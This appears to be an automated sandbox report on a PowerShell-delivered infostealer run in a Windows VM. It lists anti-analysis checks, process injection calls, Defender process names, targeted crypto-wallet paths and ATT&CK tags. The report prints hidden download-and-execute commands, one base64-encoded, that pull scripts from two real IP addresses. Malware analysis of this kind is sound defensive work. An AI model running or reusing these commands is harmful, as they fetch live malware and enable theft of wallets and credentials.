            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736Thread sleep count: 4937 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104Thread sleep count: 4715 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6572Thread sleep time: -18446744073709540s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2616Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5388Thread sleep count: 5417 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5796Thread sleep count: 4266 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4444Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3772Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_6E2F6CE9 FindFirstFileExW,5_2_6E2F6CE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Amcache.hve.19.drBinary or memory string: VMware
            Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.19.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.19.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.19.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.19.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: powershell.exe, 00000008.00000002.2283880375.0000000007363000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
            Source: Amcache.hve.19.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VirtualMachine:
            Source: Amcache.hve.19.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: powershell.exe, 00000003.00000002.2215011950.00000169C8100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.19.drBinary or memory string: vmci.sys
            Source: Amcache.hve.19.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin`
            Source: powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: Amcache.hve.19.drBinary or memory string: \driver\vmci,\driver\pci
            Source: powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
            Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.19.drBinary or memory string: VMware20,1
            Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.19.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.19.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.19.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.19.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3FE37 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00D3FE37
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D2B905 __EH_prolog3_GS,#540,#4155,StringFromGUID2,wsprintfW,RegQueryValueW,#540,#540,#538,#4155,#4155,#940,#4155,#940,#1197,#355,#2507,#3494,#858,#800,#800,#641,LoadLibraryW,GetProcAddress,#800,#641,#4155,#4155,#940,#1197,FreeLibrary,#6398,#800,#800,#800,#800,5_2_00D2B905
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_6E2F86D4 GetProcessHeap,5_2_6E2F86D4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3FAC0 SetUnhandledExceptionFilter,5_2_00D3FAC0
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3F4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00D3F4CC
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3FE37 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00D3FE37
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_6E2F5312 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6E2F5312
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_6E2F1386 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6E2F1386
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_6E2F1865 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6E2F1865

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: 8.2.powershell.exe.8670000.9.raw.unpack, ClasserPlus.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 8.2.powershell.exe.8670000.9.raw.unpack, ClasserPlus.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 8.2.powershell.exe.8670000.9.raw.unpack, ClasserPlus.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.0.csJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded iwr -useb http://185.149.146.164/wrcaf.ps1 | iex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded iwr -useb http://185.149.146.164/wrcaf.ps1 | iexJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgAJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Temp\Package.exe C:\Windows\Temp\Package.exeJump to behavior
            Source: C:\Windows\Temp\Package.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C9B.tmp" "c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP"Jump to behavior
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3C7BB SetSecurityDescriptorDacl,GetLastError,5_2_00D3C7BB
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3DA20 GetCurrentProcess,OpenProcessToken,malloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,free,CloseHandle,5_2_00D3DA20
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ProgMan
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd!SHELLDLL_DefView
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_6E2F1A28 cpuid 5_2_6E2F1A28
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3FCE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_00D3FCE5
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3C9DB LookupAccountNameW,GetLastError,malloc,LookupAccountNameW,GetLastError,free,5_2_00D3C9DB
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D2B4F0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,GetVersionExW,#1202,#538,#800,#6112,#2613,#384,#2089,#1197,#520,#986,#4604,#1197,#5977,5_2_00D2B4F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: Yara matchFile source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
            Source: Amcache.hve.19.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.19.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, Amcache.hve.19.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum#\Electrum\wallets
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: exodus
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
            Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
            Source: powershell.exe, 00000000.00000002.2242371379.00007FF848EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Source: Yara matchFile source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D34899 #1662,#540,lstrcpyW,CreateBindCtx,MkParseDisplayName,#2644,#2810,#800,lstrlenW,#2810,#2644,#800,5_2_00D34899
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            11
            Deobfuscate/Decode Files or Information
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            11
            Ingress Tool Transfer
